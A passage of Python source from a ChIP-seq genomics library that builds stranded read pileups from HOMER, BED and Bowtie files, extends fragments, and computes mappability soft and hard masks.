Parses HOMER's tagLengthDistribution.txt file and returns the mode (most common value) of the distribution
"""
tag_length_frequencies = []
with open(tag_length_distribution_filename) as tag_length_file:
tag_length_file.readline()
tag_length_frequencies = []
for line in tag_length_file:
split_line = line.split('\t')
tag_length_frequencies.append((int(split_line[0]), float(split_line[1])))
return sorted(tag_length_frequencies, key=lambda x: x[1])[-1][0]
def load_soft_masked_from_homer(config, chrom_lengths, name, build, homer_tag_directory,
chromosome_dialect=DEFAULT_CHROMOSOME_DIALECT, conservative_hard_mask=False,
mem_map_mode='r',
validate=False, disable_soft_mask=False, max_clonality=1.0):
"""
Convenience function that:
1. Generates a stranded pileup vector from a readset file using the fragment extension method
2. Generates a soft mask for the given fragment length from a file of alignable start sites for the given read length.
3. Applies the soft mask while mixing down the stranded pileup vector to a single strand
4. Generates a hard mask from regions in the soft mask that are zero on both strands, representing areas with no possible
fragment density.
5. Returns both the unstranded, soft-masked, fragment pileup vector and the hard mask.
Now, will look for a pre-saved pileup data folder in a subfolder of PILEUP_DATA_FOLDER having the name of the tagalign file.
:return:
"""
rep_name = homer_tag_directory.strip('/').split(os.path.sep)[-1]
if rep_name.endswith('/'): rep_name = rep_name[:-1]
print('Rep name: {}'.format(rep_name))
data_save_folder = os.path.join(PILEUP_DATA_FOLDER, rep_name + '_data')
toolbox.establish_path(PILEUP_DATA_FOLDER)
overall_load_start_time = datetime.datetime.now()
print('Looking for pre-generated data pileup in {}'.format(data_save_folder))
generate_data = False
need_soft_mask = False
generate_soft_mask = False
generate_hard_mask = False
try:
unstranded_chip = Pileups.load(data_save_folder, mmap_mode=mem_map_mode)
except (IOError, OSError) as ex:
print('Pre-generated data not found. Will generate now.')
generate_data = True
else:
read_length = unstranded_chip.mode_read_length
if generate_data:
print()
print('Generating pileup vector from HOMER tag folder {} using fragment extension method'.format(
homer_tag_directory))
chip_starts = StrandedPileups(chrom_lengths=chrom_lengths, name='{}_starts'.format(name),
build=build,
chromosome_dialect=chromosome_dialect)
chip_starts.load_from_homer_tag_directory(input_filename=homer_tag_directory, region_handling='starts')
chip_starts.mode_read_length = homer_get_mode_tag_length(
os.path.join(homer_tag_directory, 'tagLengthDistribution.txt'))
if max_clonality is not None:
print('Filtering to allow maximum {} reads at each locus ...'.format(max_clonality))
for chrom in chip_starts.spileups:
for strand in chip_starts.spileups[chrom]:
chip_starts.spileups[chrom][strand] = numpy.clip(chip_starts.spileups[chrom][strand], a_min=0, a_max=max_clonality)
fragment_length = get_fragment_size_from_file(rep_name)
if not fragment_length:
# get fragment size from homer
homer_info = homer_parse_taginfo(os.path.join(homer_tag_directory, 'tagInfo.txt'))
fragment_length = homer_info['fragmentLengthEstimate']
save_fragment_length(rep_name, fragment_length)
print()
print('Extending data reads to fragments of size {} ...'.format(fragment_length))
stranded_chip = chip_starts.fragExtend(fragment_length)
read_length = chip_starts.mode_read_length # grab this number before we delete the whole thing
del chip_starts
need_soft_mask = True
else:
fragment_length = get_fragment_size_from_file(rep_name)
hard_mask_save_folder = os.path.join(PILEUP_DATA_FOLDER, '{}_{}_{}{}_hard_mask'.format(build, read_length, fragment_length,
['', '_conservative'][
conservative_hard_mask]))
try:
print('Looking for pre-generated hard mask pileup in {}'.format(hard_mask_save_folder))
hard_mask = Pileups.load(hard_mask_save_folder, mmap_mode=mem_map_mode)
except (IOError, OSError) as ex:
print('Pre-generated hard mask not found.')
generate_hard_mask = True
need_soft_mask = True
if need_soft_mask:
soft_mask_save_folder = os.path.join(PILEUP_DATA_FOLDER, '{}_{}_{}_soft_mask'.format(build, read_length, fragment_length))
try:
print('Looking for pre-generated soft mask pileup in {}'.format(soft_mask_save_folder))
soft_mask = StrandedPileups.load(soft_mask_save_folder, mmap_mode=mem_map_mode)
except (IOError, OSError) as ex:
print('Pre-generated soft mask not found.')
generate_soft_mask = True
if generate_soft_mask:
print()
print('Generating soft mask ...')
ref_genome_path=toolbox.parse_path(config['REFERENCE_GENOME_PATH'])[0]
alignable_starts_filename = os.path.join(ref_genome_path,
'{}_start_regions_{}.bed'.format(build, read_length))
if not os.path.isfile(alignable_starts_filename):
mappble_basepairs = pp_mappability.get_mappability(config, read_length, make_region_file=True)
soft_mask_starts = StrandedPileups(chrom_lengths=chrom_lengths,
name='{}_{}_soft_mask_starts'.format(build, read_length),
build=build,
chromosome_dialect=chromosome_dialect)
soft_mask_starts.loadFromBed(input_filename=alignable_starts_filename, ignore_strandless=True,
display_read_lengths=False)
soft_mask = soft_mask_starts.readStartsToSoftMask(read_length=read_length, fragment_length=fragment_length)
soft_mask.save(soft_mask_save_folder)
if mem_map_mode == 'rw':
soft_mask.memMap(writable=True)
elif mem_map_mode == 'r':
soft_mask.memMap(writable=False)
if generate_hard_mask:
print()
print('Generating hard mask of unalignable regions ...')
if conservative_hard_mask:
print('\tUsing conservative approach (excluding all regions impacted by mappability)...')
hard_mask = soft_mask.mixDown().threshold(min_value=1.999)
else:
print(
'\tUsing permissive approach (excluding only regions that are totally unable to receive fragments because of mappability)')
hard_mask = soft_mask.mixDown().nonzero()
hard_mask.name = '{}_hard_mask'.format(read_length)
hard_mask.toType(numpy.bool)
hard_mask.save(hard_mask_save_folder)
if mem_map_mode == 'rw':
hard_mask.memMap(writable=True)
elif mem_map_mode == 'r':
hard_mask.memMap(writable=False)
if generate_data:
print()
if disable_soft_mask:
print('Soft mask application DISABLED')
else:
# print('Applying soft mask ...')
stranded_chip.applySoftMask(soft_mask=soft_mask)
del soft_mask
print()
print('Mixing down stranded ChIP pileups to single-stranded...')
unstranded_chip = stranded_chip.mixDown()
del stranded_chip
unstranded_chip.toType(PILEUP_DTYPE)
print()
print('All done loading {} in {}'.format(unstranded_chip.name,
datetime.datetime.now() - overall_load_start_time))
unstranded_chip.save(data_save_folder)
if mem_map_mode == 'rw':
unstranded_chip.memMap(writable=True)
elif mem_map_mode == 'r':
unstranded_chip.memMap(writable=False)
if validate:
print('Validating...')
to_use = numpy.nonzero(hard_mask.flatten())[0]
min_chip = unstranded_chip.flatten()[to_use].min()
max_chip = unstranded_chip.flatten()[to_use].max()
print('Min value: {}, max value: {}'.format(min_chip, max_chip))
if max_chip > fragment_length * 2:
raise Exception(
'Invalid maximum pileup height {} in {}, should <= 2 * fragment size of {}'.format(max_chip,
unstranded_chip.name,
fragment_length))
print('Loaded successfully in {}.'.format(datetime.datetime.now() - overall_load_start_time))
return unstranded_chip, hard_mask
def load_soft_masked_from_homer_nomask(config, chrom_lengths, name, build, homer_tag_directory,
chromosome_dialect=DEFAULT_CHROMOSOME_DIALECT,
mem_map_mode='r', max_clonality=1.0,
validate=False):
"""
Convenience function that:
1. Generates a stranded pileup vector from a readset file using the fragment extension method
5. Returns both the unstranded, fragment pileup vector.
Now, will look for a pre-saved pileup data folder in a subfolder of PILEUP_DATA_FOLDER having the name of the tagalign file.
:return:
"""
rep_name = homer_tag_directory.strip('/').split(os.path.sep)[-1]
if rep_name.endswith('/'): rep_name = rep_name[:-1]
print('Rep name: {}'.format(rep_name))
data_save_folder = os.path.join(PILEUP_DATA_FOLDER, rep_name + '_data')
toolbox.establish_path(PILEUP_DATA_FOLDER)
overall_load_start_time = datetime.datetime.now()
print('Looking for pre-generated data pileup in {}'.format(data_save_folder))
generate_data = False
try:
unstranded_chip = Pileups.load(data_save_folder, mmap_mode=mem_map_mode)
except (IOError, OSError) as ex:
print('Pre-generated data not found. Will generate now.')
generate_data = True
else:
read_length = unstranded_chip.mode_read_length
if generate_data:
print()
print('Generating pileup vector from HOMER tag folder {} using fragment extension method'.format(
homer_tag_directory))
chip_starts = StrandedPileups(chrom_lengths=chrom_lengths, name='{}_starts'.format(name),
build=build,
chromosome_dialect=chromosome_dialect)
chip_starts.load_from_homer_tag_directory(input_filename=homer_tag_directory, region_handling='starts')
chip_starts.mode_read_length = homer_get_mode_tag_length(
os.path.join(homer_tag_directory, 'tagLengthDistribution.txt'))
if max_clonality > 0:
print('Filtering to allow maximum {} reads at each locus ...'.format(max_clonality))
for chrom in chip_starts.spileups:
for strand in chip_starts.spileups[chrom]:
chip_starts.spileups[chrom][strand] = numpy.clip(chip_starts.spileups[chrom][strand], a_min=0, a_max=max_clonality)
fragment_length = get_fragment_size_from_file(rep_name)
if not fragment_length:
# get fragment size from homer
homer_info = homer_parse_taginfo(os.path.join(homer_tag_directory, 'tagInfo.txt'))
fragment_length = homer_info['fragmentLengthEstimate']
save_fragment_length(rep_name, fragment_length)
print()
print('Extending data reads to fragments of size {} ...'.format(fragment_length))
stranded_chip = chip_starts.fragExtend(fragment_length)
read_length = chip_starts.mode_read_length # grab this number before we delete the whole thing
del chip_starts
else:
fragment_length = get_fragment_size_from_file(rep_name)
if generate_data:
print()
print('Mixing down stranded ChIP pileups to single-stranded...')
unstranded_chip = stranded_chip.mixDown()
del stranded_chip
unstranded_chip.toType(PILEUP_DTYPE)
print()
print('All done loading {} in {}'.format(unstranded_chip.name,
datetime.datetime.now() - overall_load_start_time))
unstranded_chip.save(data_save_folder)
if mem_map_mode == 'rw':
unstranded_chip.memMap(writable=True)
elif mem_map_mode == 'r':
unstranded_chip.memMap(writable=False)
if validate:
print('Validating...')
to_use = numpy.nonzero(hard_mask.flatten())[0]
min_chip = unstranded_chip.flatten()[to_use].min()
max_chip = unstranded_chip.flatten()[to_use].max()
print('Min value: {}, max value: {}'.format(min_chip, max_chip))
if max_chip > fragment_length * 2:
raise Exception(
'Invalid maximum pileup height {} in {}, should <= 2 * fragment size of {}'.format(max_chip,
unstranded_chip.name,
fragment_length))
print('Loaded successfully in {}.'.format(datetime.datetime.now() - overall_load_start_time))
return unstranded_chip
def frag_extend_chromslave(params):
"""
Used to extend stranded chromosomes in a multi-process manner.
"""
chrom_start_time = datetime.datetime.now()
chrom, read_starts, frag_length = params
dbg_print('Extending chromosome {}...'.format(chrom), 1)
neg_strand, pos_strand = read_starts
# copy and convert to float64 for optimal speed
neg_strand = neg_strand.astype(numpy.float64)
pos_strand = pos_strand.astype(numpy.float64)
extended_strands = [neg_strand.copy(), pos_strand.copy()]
for i in range(1, frag_length):
extended_strands[0][:-i] += neg_strand[i:]
extended_strands[1][i:] += pos_strand[:-i]
dbg_print('Done extending chromosome {} in {}'.format(chrom, datetime.datetime.now() - chrom_start_time), 1)
return chrom, extended_strands
def binding_energy_chromslave(params):
chrom, sequence_vector, motif = params
# print 'Chrom: {}, motif: {}'.format(chrom, motif)
# print 'Sequence vector: {} {}'.format(sequence_vector.shape, sequence_vector[:10])
# return chrom, (motifs.scan_pwm(sequence_vector[::-1], motif)[::-1], motifs.scan_pwm(sequence_vector, motif))
return chrom, (
motifs.scan_pwm(sequence_vector, motifs.motif_rev_complement(motif)), motifs.scan_pwm(sequence_vector, motif))
def soft_mask_generate_chromslave(params, check_empty=False):
this_chrom_start_time = datetime.datetime.now()
chrom, fragment_starts, read_length, fragment_length = params
for i in range(len(fragment_starts)):
if fragment_starts[i].dtype != numpy.float64:
fragment_starts[i] = fragment_starts[i].astype(numpy.float64)
# first check if chromosome is empty
if not check_empty or numpy.abs(fragment_starts).sum() > 0 or numpy.abs(fragment_starts).sum() > 0:
dbg_print('Processing chromosome {} ({} bp)...'.format(chrom, len(fragment_starts)), 1)
soft_mask = {}
# positive strand
soft_mask[1] = fragment_starts.copy() # account for fragment starts (offset 0)
# progressively shift and add the start sites up to <fragment_length> to effectively extend the fragments
for offset in range(1, fragment_length):
soft_mask[1][offset:] += fragment_starts[:-offset]
soft_mask[1] /= float(fragment_length)
# negative strand is an image of the positive strand offset by fragment_size + read_length
soft_mask[-1] = numpy.zeros(len(fragment_starts))
soft_mask[-1][:-fragment_length + read_length] = soft_mask[1][
fragment_length - read_length:]
dbg_print('Done with chromosome {} in {}'.format(chrom, datetime.datetime.now() - this_chrom_start_time), 1)
else:
# if empty, soft mask is all zeroes for that chromosome
dbg_print('Chromosome {} is empty, skipping...'.format(chrom), 1)
soft_mask = {1: numpy.zeros(len(fragment_starts)), -1: numpy.zeros(len(fragment_starts))}
return chrom, (soft_mask[-1], soft_mask[1])
def cross_correlate_chromslave(params, check_empty=True):
start_time = datetime.datetime.now()
chrom, chunk_idx, chrom_strands = params
neg_strand, pos_strand = chrom_strands
del chrom_strands
if neg_strand.dtype != numpy.float64:
neg_strand = neg_strand.astype(numpy.float64)
if pos_strand.dtype != numpy.float64:
pos_strand = pos_strand.astype(numpy.float64)
# del chrom_strands
if (numpy.abs(neg_strand).sum() > 0 and numpy.abs(pos_strand).sum() > 0) or not check_empty:
dbg_print('Cross-correlating chunk {} of chromosome {} ...'.format(chunk_idx, chrom), 1)
cc = scipy.signal.fftconvolve(neg_strand, pos_strand[::-1], mode='same')
dbg_print('Done cross-correlating chunk {} of chromosome {} in {}'.format(chunk_idx, chrom,
datetime.datetime.now() - start_time),
1)
else:
dbg_print('Chromosome {} is empty, skipping...'.format(chrom), 1)
cc = numpy.zeros(len(neg_strand))
# cc = toolbox.replace_with_mem_map(cc, read_only=True, tmp_dir=LOCAL_TMP_DIR)
return chrom, chunk_idx, cc
class StrandedPileups(object):
def __init__(self, chrom_lengths={}, input_filename='', name='', build='',
chromosome_dialect=DEFAULT_CHROMOSOME_DIALECT, pileup_dtype=PILEUP_DTYPE):
self.id = toolbox.random_identifier(32)
self.pileup_dtype = pileup_dtype
self.save_path = None
self.name = name
self.build = build
self.spileups = {}
self.chrom_lengths = {}
# self.genome_size = -1
self.read_counts = {}
self.chromosome_dialect = chromosome_dialect
for chrom in chrom_lengths:
translated_chrom = toolbox.convert_chroms(chrom, dest=self.chromosome_dialect)
self.chrom_lengths[translated_chrom] = chrom_lengths[chrom]
self.spileups[translated_chrom] = {}
self.spileups[translated_chrom][-1] = numpy.zeros(chrom_lengths[chrom],
dtype=self.pileup_dtype) # negative strand
self.spileups[translated_chrom][1] = numpy.zeros(chrom_lengths[chrom],
dtype=self.pileup_dtype) # positive strand
self.read_counts[translated_chrom] = 0
# self.genome_size += chrom_lengths[chrom]
self.is_normalized = False
self.total_read_length = 0
self.total_reads = 0
self.coverage = 0
self.fragment_size = -1
self.mean_read_length = -1
self.mode_read_length = -1
# self.max_height = -1
self.input_filename = input_filename
print(('Initialized new stranded pileup object: {}, genome build: {}, chromosome dialect: {}'.format(self.name,
self.build,
self.chromosome_dialect)))
# print 'Initialized with chromosomes {} in length dict; {} in pileups'.format(', '.join(sorted(list(self.chrom_lengths.keys()))), ', '.join(sorted(list(self.spileups.keys()))))
if self.input_filename:
if input_filename.endswith('.bwtout.txt'):
self.loadFromBowtie(input_filename)
else:
self.loadFromBed(input_filename)
@property
def genome_size(self):
return sum(self.chrom_lengths.values())
def __del__(self):
if self.save_path and os.path.exists(self.save_path):
try:
shutil.rmtree(self.save_path)
except (OSError, IOError) as ex:
print(('Tried to delete {} but caught {} instead'.format(self.save_path, ex)))
def __iadd__(self, other):
try:
assert self.build == other.build
self.name = '({}+{})'.format(self.name, other.name)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
assert len(self.spileups[chrom][strand]) == len(other.spileups[chrom][strand])
self.spileups[chrom][strand] += other.pileups[chrom][strand]
self.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
self.name = '({}+{})'.format(self.name, other)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
self.spileups[chrom][strand] = numpy.add(self.spileups[chrom][strand], other)
return self
def __isub__(self, other):
try:
assert self.build == other.build
self.name = '({}-{})'.format(self.name, other.name)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
assert len(self.spileups[chrom][strand]) == len(other.spileups[chrom][strand])
self.spileups[chrom][strand] -= other.pileups[chrom][strand]
self.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
self.name = '({}-{})'.format(self.name, other)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
self.spileups[chrom][strand] = numpy.subtract(self.spileups[chrom][strand], other)
return self
def __imul__(self, other):
try:
assert self.build == other.build
self.name = '({}*{})'.format(self.name, other.name)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
assert len(self.spileups[chrom][strand]) == len(other.spileups[chrom][strand])
self.spileups[chrom][strand] *= other.pileups[chrom][strand]
self.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
self.name = '({}*{})'.format(self.name, other)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
self.spileups[chrom][strand] = numpy.multiply(self.spileups[chrom][strand], other)
return self
def __idiv__(self, other):
try:
assert self.build == other.build
self.name = '({}/{})'.format(self.name, other.name)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
assert len(self.spileups[chrom][strand]) == len(other.spileups[chrom][strand])
self.spileups[chrom][strand] /= other.pileups[chrom][strand].astype(float)
self.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
self.name = '({}/{})'.format(self.name, other)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
self.spileups[chrom][strand] = numpy.divide(self.spileups[chrom][strand], float(other))
return self
def __add__(self, other):
result = self.emptyCopy()
try:
assert self.build == other.build
result.name = '({}+{})'.format(self.name, other.name)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
assert len(self.spileups[chrom][strand]) == len(other.spileups[chrom][strand])
result.spileups[chrom][strand] = self.spileups[chrom][strand] + other.spileups[chrom][strand]
result.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
for chrom in self.spileups:
for strand in self.spileups[chrom]:
result.spileups[chrom][strand] = numpy.add(self.spileups[chrom][strand], other)
result.name = '({}+{})'.format(self.name, other)
return result
def __sub__(self, other):
result = self.emptyCopy()
try:
assert self.build == other.build
result.name = '({}-{})'.format(self.name, other.name)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
assert len(self.spileups[chrom][strand]) == len(other.spileups[chrom][strand])
result.spileups[chrom][strand] = self.spileups[chrom][strand] - other.spileups[chrom][strand]
result.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
for chrom in self.spileups:
for strand in self.spileups[chrom]:
result.spileups[chrom][strand] = numpy.subtract(self.spileups[chrom][strand], other)
result.name = '({}-{})'.format(self.name, other)
return result
def __mul__(self, other):
result = self.emptyCopy()
try:
assert self.build == other.build
result.name = '({}*{})'.format(self.name, other.name)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
assert len(self.spileups[chrom][strand]) == len(other.spileups[chrom][strand])
result.spileups[chrom][strand] = self.spileups[chrom][strand] * other.spileups[chrom][strand]
result.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
for chrom in self.spileups:
for strand in self.spileups[chrom]:
result.spileups[chrom][strand] = numpy.multiply(self.spileups[chrom][strand], other)
result.name = '({}*{})'.format(self.name, other)
return result
def __div__(self, other):
result = self.emptyCopy()
try:
assert self.build == other.build
result.name = '({}/{})'.format(self.name, other.name)
for chrom in self.spileups:
if chrom not in result.spileups: # ToDo: extend this fix to other operations for StrandedPileup
result.spileups[chrom] = {}
for strand in self.spileups[chrom]:
assert len(self.spileups[chrom][strand]) == len(other.spileups[chrom][strand])
result.spileups[chrom][strand] = self.spileups[chrom][strand] / other.spileups[chrom][strand].astype(float)
result.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
# print ex
for chrom in self.spileups:
if chrom not in result.spileups: # ToDo: extend this fix to other operations for StrandedPileup
result.spileups[chrom] = {}
for strand in self.spileups[chrom]:
result.spileups[chrom][strand] = numpy.divide(self.spileups[chrom][strand], float(other))
result.name = '({}/{})'.format(self.name, other)
return result
def __pos__(self):
return self
def __neg__(self):
negated = StrandedPileups(self.chrom_lengths, build=self.build, name=self.name)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
negated.spileups[chrom][strand] = -self.spileups[chrom][strand]
return negated
def __len__(self):
return self.genome_size
def __abs__(self):
result = StrandedPileups(self.chrom_lengths, build=self.build, name=self.name)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
result.spileups[chrom] = numpy.abs(self.spileups[chrom])
return result
def __repr__(self):
result = 'Pileups object. Name: {}, Build: {}\n'.format(self.name, self.build)
result += 'Chromosome lengths:\n'
for chrom in self.chrom_lengths:
result += '\t{:>40}\t{:>11}\n'.format(chrom, self.chrom_lengths[chrom])
try:
result += 'Data type: {}\n'.format(list(self.spileups.values())[0][1].dtype)
except Exception:
pass
return result
def loadFromBowtie(self, bowtie_filename, ignore_strandless=False):
"""
Populate the pileup vector from a bowtie output file (.bwt)
Each strand will go into a separate vector
"""
start_time = datetime.datetime.now()
strand_translator = {'+': 1, '-': -1}
missing_chroms = set([])
self.read_length_counts = {}
self.input_filename = bowtie_filename
with open(bowtie_filename, 'rt') as bwt_file:
print(('Computing stranded pileup vectors from reads in {} ...'.format(bowtie_filename)))
for line_num, line in enumerate(bwt_file):
if line_num % REPORTING_INTERVAL == 0:
dbg_print('Reading line {}'.format(line_num), 1)
if len(line) > 0:
split_line = line.strip().split('\t')
strand = strand_translator[split_line[1]]
chrom = toolbox.convert_chroms(split_line[2], dest=self.chromosome_dialect)
if chrom in self.spileups:
self.read_counts[chrom] += 1
start_pos = int(split_line[3])
end_pos = start_pos + len(split_line[4])
read_length = end_pos - start_pos
if read_length not in self.read_length_counts:
self.read_length_counts[read_length] = 0
else:
self.read_length_counts[read_length] += 1
self.total_read_length += read_length
self.spileups[chrom][strand][start_pos:end_pos] += 1
else:
missing_chroms.add(chrom)
self.total_reads = sum(self.read_counts.values())
self.mode_read_length = max(list(self.read_length_counts.items()), key=lambda x: x[1])[0]
if self.total_reads > 0:
self.mean_read_length = self.total_read_length / float(self.total_reads)
else:
self.mean_read_length = 0
self.computeCoverage()
print(('\tMean coverage: {}'.format(self.coverage)))
if missing_chroms:
print((
'\tThe following chromosomes were found in the reads file but not in the defined chromosome structure: {}'.format(
', '.join(sorted(list(missing_chroms))))))
print(('Done in {}.'.format(datetime.datetime.now() - start_time)))
def loadFromBed(self, input_filename, region_handling=None, ignore_strandless=False,
display_read_lengths=True):
"""
Populate the pileup vector from a BED file (each genomic position will contains a count of the number of BED regions that overlap it)
Each strand will go into a separate vector
"""
start_time = datetime.datetime.now()
strand_translator = {'+': 1, '-': -1}
self.input_filename = input_filename
# print 'Chromosome dialect for bed file given as: {}'.format(reads_chromosome_dialect)
self.read_length_counts = collections.defaultdict(lambda: 0)
self.total_read_density = collections.defaultdict(lambda: 0)
missing_chroms = set([])
start_only = False
end_only = False
print(('Computing stranded pileup vectors from regions in {} ...'.format(input_filename)))
if region_handling == 'starts':
start_only = True
print('Using region starts only.')
elif region_handling == 'ends':
end_only = True
print('Using region ends sites only.')
elif region_handling != None:
raise ValueError('Received invalid value for parameter <region_handling>. Got {}'.format(region_handling))
with open(input_filename, 'rt') as tag_file:
for line_num, line in enumerate(tag_file):
if line_num % REPORTING_INTERVAL == 0:
dbg_print('Reading line {}'.format(line_num), 1)
split_line = line.strip().split('\t')
if len(line) > 0:
chrom = toolbox.convert_chroms(split_line[0], dest=self.chromosome_dialect)
# print split_line
if len(split_line) >= 6:
strand = strand_translator[split_line[5]]
else:
strand = 1
if not ignore_strandless:
raise Exception("\tRead with no strand found on line {}: {}".format(line_num, line))
if chrom in self.spileups:
self.read_counts[chrom] += 1
start_pos = int(split_line[1])
end_pos = int(split_line[2]) - 1
read_length = end_pos - start_pos + 1
self.total_read_density[chrom] += read_length
self.read_length_counts[read_length] += 1
assert start_pos >= 0
assert end_pos < self.chrom_lengths[chrom]
if (start_only and strand == 1) or (end_only and strand == -1):
self.spileups[chrom][strand][start_pos] += 1
# print 'read: {}, updating position {}'.format(line, start_pos)
elif (end_only and strand == 1) or (start_only and strand == -1):
self.spileups[chrom][strand][end_pos] += 1
# print 'read: {}, updating position {}'.format(line, end_pos)
else:
self.spileups[chrom][strand][start_pos:end_pos] += 1
else:
if chrom not in missing_chroms:
dbg_print('Chromosome {} not found in self!'.format(chrom), 1)
missing_chroms.add(chrom)
print('Done reading file.')
if missing_chroms:
print((
'\tThe following chromosomes were present in the bed file but not in the length dictionary: {}'.format(
', '.join(sorted(list(missing_chroms))))))
# print '\tChromosome lengths in self:'
# for chrom in toolbox.numerical_string_sort(self.chrom_lengths):
# print '\t\t{:<20}: {}'.format(chrom, self.chrom_lengths[chrom])
if display_read_lengths:
dbg_print('Read length counts:', 1)
for read_length in sorted(self.read_length_counts.keys()):
dbg_print('{}: {}'.format(read_length, self.read_length_counts[read_length]), 2)
self.mode_read_length = max(list(self.read_length_counts.items()), key=lambda x: x[1])[0]
dbg_print('{:<25} {:>10} {:>10}'.format('Chromosome', 'Reads', 'Coverage'), 1)
for chrom in toolbox.numerical_string_sort(self.read_counts):
dbg_print('{:<25} {:>10} {:>10}'.format(chrom, self.read_counts[chrom],
self.total_read_density[chrom] / float(
self.chrom_lengths[chrom])))
self.total_reads = sum(self.read_counts.values())
self.total_read_length = sum(self.total_read_density.values())
if self.total_reads > 0:
self.mean_read_length = self.total_read_length / float(self.total_reads)
else:
self.mean_read_length = 0
self.computeCoverage()
print(('\tMean coverage: {}'.format(self.coverage)))
print(('Done in {}.'.format(datetime.datetime.now() - start_time)))
def load_from_homer_tag_directory(self, input_filename, region_handling=None,
display_read_lengths=True):
"""
Populate the pileup vector from a BED file (each genomic position will contains a count of the number of tags that overlap it)
Each strand will go into a separate vector.
"""
start_time = datetime.datetime.now()
strand_translator = {'0': 1, '1': -1}
self.input_filename = input_filename
self.read_length_counts = collections.defaultdict(lambda: 0)
self.total_read_density = collections.defaultdict(lambda: 0)
missing_chroms = set([])
start_only = False
end_only = False
print('Computing stranded pileup vectors from HOMER tag directory {} ...'.format(input_filename))
if region_handling == 'starts':
start_only = True
print('Using region starts only.')
elif region_handling == 'ends':
end_only = True
print('Using region ends sites only.')
elif region_handling != None:
raise ValueError('Received invalid value for parameter <region_handling>. Got {}'.format(region_handling))
for tag_file in sorted([f for f in os.listdir(input_filename) if f.endswith('.tags.tsv')]):
print('\tProcessing tag file {}'.format(tag_file))
with open(os.path.join(input_filename, tag_file), 'rt') as tag_file:
for line_num, line in enumerate(tag_file):
# if line_num % REPORTING_INTERVAL == 0:
# dbg_print('Reading line {}'.format(line_num), 1)
split_line = line.strip().split('\t')
if len(line) > 0:
chrom = toolbox.convert_chroms(split_line[0], dest=self.chromosome_dialect)
# print split_line
strand = strand_translator[split_line[2]]
if chrom in self.spileups:
read_length = int(split_line[4])
start_pos = int(split_line[1]) - 1
if strand == 1:
end_pos = start_pos + read_length
else:
end_pos = start_pos - read_length
num_reads = float(split_line[3])
assert 0 <= start_pos < self.chrom_lengths[
chrom], 'Read start position {} is out of bounds for chromosome {} with bounds [{},{}). Offending line: {}'.format(
start_pos, chrom, 0, self.chrom_lengths[chrom], line)
assert 0 <= end_pos < self.chrom_lengths[
chrom], 'Read end position {} is out of bounds for chromosome {} with bounds [{},{}), strand {} Offending line: {}'.format(
end_pos, chrom, 0, self.chrom_lengths[chrom], strand, line)
self.read_counts[chrom] += num_reads
self.total_read_density[chrom] += read_length * num_reads
self.read_length_counts[read_length] += num_reads
if (start_only and strand == 1) or (end_only and strand == -1):
self.spileups[chrom][strand][start_pos] += num_reads
# print 'read: {}, updating position {}'.format(line, start_pos)
elif (end_only and strand == 1) or (start_only and strand == -1):
self.spileups[chrom][strand][end_pos] += num_reads
# print 'read: {}, updating position {}'.format(line, end_pos)
else:
self.spileups[chrom][strand][start_pos:end_pos] += num_reads
else:
if chrom not in missing_chroms:
dbg_print('Chromosome {} not found in self!'.format(chrom), 1)
missing_chroms.add(chrom)
# print '\tDone.'
print('Done with tag directory')
if missing_chroms:
print('\tThe following chromosomes were present in the bed file but not in the length dictionary: {}'.format(
', '.join(sorted(list(missing_chroms)))))
if display_read_lengths:
dbg_print('Read length counts:', 1)
for read_length in sorted(self.read_length_counts.keys()):
dbg_print('{}: {}'.format(read_length, self.read_length_counts[read_length]), 2)
self.mode_read_length = max(list(self.read_length_counts.items()), key=lambda x: x[1])[0]
dbg_print('{:<25} {:>10} {:>10}'.format('Chromosome', 'Reads', 'Coverage'), 1)
for chrom in toolbox.numerical_string_sort(self.read_counts):
dbg_print('{:<25} {:>10} {:>10}'.format(chrom, self.read_counts[chrom],
self.total_read_density[chrom] / float(
self.chrom_lengths[chrom])))
self.total_reads = sum(self.read_counts.values())
self.total_read_length = sum(self.total_read_density.values())
if self.total_reads > 0:
self.mean_read_length = self.total_read_length / float(self.total_reads)
else:
self.mean_read_length = 0
self.computeCoverage()
print('\tMean coverage: {}'.format(self.coverage))
print('Done in {}.'.format(datetime.datetime.now() - start_time))
# def computeBindingEnergy(self, fasta_filename, jaspar_filename):
# """
# Computes a binding energy profile for the motif defined by <jaspar_filename> interacting with the genomic
# sequence given in <fasta_filename> for each strand (negative strand uses reverse complement sequence). The
# binding energy for each subsequence is
# :param fasta_filename:
# :param jaspar_filename:
# :return:
# """
# start_time = datetime.datetime.now()
# print 'Computing binding energy vectors for \'{}\' using motif file {} and reference sequence {}.'.format(
# self.name, jaspar_filename, fasta_filename)
#
# with open(fasta_filename, 'rt') as fasta_file:
# sequence_dict = toolbox.parse_fasta_dict(fasta_file.read())
#
# # make sure the sequence file matches our vectors
# for chrom in self.chrom_lengths:
# assert chrom in sequence_dict
# assert len(sequence_dict[chrom]) == self.chrom_lengths[chrom]
# # print chrom, len(sequence_dict[chrom]), self.chrom_lengths[chrom]
#
# # compute global background dist:
# print '\tComputing background distribution of nucleotides...'
# background_freqs = {}
# for chrom in self.chrom_lengths:
# background_freqs = toolbox.dict_add(background_freqs, toolbox.freq(sequence_dict[chrom]))
# total_nucleotides = sum(background_freqs.values())
# background_model = numpy.zeros(4)
# for i, nuc in enumerate(('A', 'C', 'G', 'T')):
# background_model[i] = background_freqs[nuc] / float(total_nucleotides)
